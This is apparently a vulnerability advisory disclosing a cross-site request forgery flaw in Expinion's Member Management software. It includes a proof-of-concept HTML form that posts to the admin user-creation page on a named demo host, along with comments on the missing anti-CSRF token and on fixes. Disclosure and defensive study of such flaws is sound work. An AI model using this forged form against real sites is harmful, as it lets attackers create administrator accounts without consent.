< ------------------- header data start ------------------- >
#############################################################
# Application Name :Member Management by Expinion
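# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)
# Impact : A new admin can be added.
# Bug Fix Advice : A session key (session token) should be added to the form and checked by the server on every submission.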
# author : BUG RESEARCHERS//CWH1RLPOOL
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Request shape described by the advisory: a POST to the admin "add user"
  handler (admin/user_add.asp). Every field below is a fixed, predictable
  name: name, company, email, username, password, the custom fields "1" and
  "4", units and active. None of them carries a per-session or per-request
  secret, which is the condition the advisory header reports as XSRF.

  Defensive reading: the handler should refuse any POST that lacks a valid
  anti-CSRF token bound to the administrator's session. Checking the
  Origin/Referer header and setting the SameSite attribute on the session
  cookie are useful additional layers, not substitutes for the token.

  NOTE(review): whether the server applies any check beyond these fields
  cannot be seen from this listing; that claim rests on the advisory itself.
-->
<form action=http://www.europeum.net/Demos/MMS/admin/user_add.asp method=post name=frm onSubmit=return ValidateUser()>
<input style=width: 350; type=Text name=name value= size=40 maxlength=95 class=textbox />
<input style=width: 350; type=Text name=company value= size=40 maxlength=85 class=textbox />
<input style=width: 350; type=Text name=email value= size=40 maxlength=75 class=textbox />
<input style=width: 290; type=Text name=username value= size=30 maxlength=25 class=textbox />
<input style=width: 290; type=Text name=password value= size=30 maxlength=25 class=textbox />
<!--
  Custom fields "1" and "4": as captured here their attribute values are
  wrapped in typographic quotes rather than ASCII quotes, presumably an
  artifact of how the page was published. Treat the markup as a record of
  the field names, not as well-formed HTML.
-->
<input style=’width: 350px;’ type=’Text’ value=’Admin can add custom fields like this one, the checkbox below, or the My Form field.’ name=’1’ class=’textbox’>
<input style=’’ type=’Checkbox’ value=’I agree to the terms and conditions.’ name=’4’ class=’’>
<input style=width: 100%; type=Text name=units value=0 size=40 maxlength=5 class=textbox />
<input type=Checkbox name=active checked value=1 /> <img src= images/caution.gif>
< -- bug code end of -- >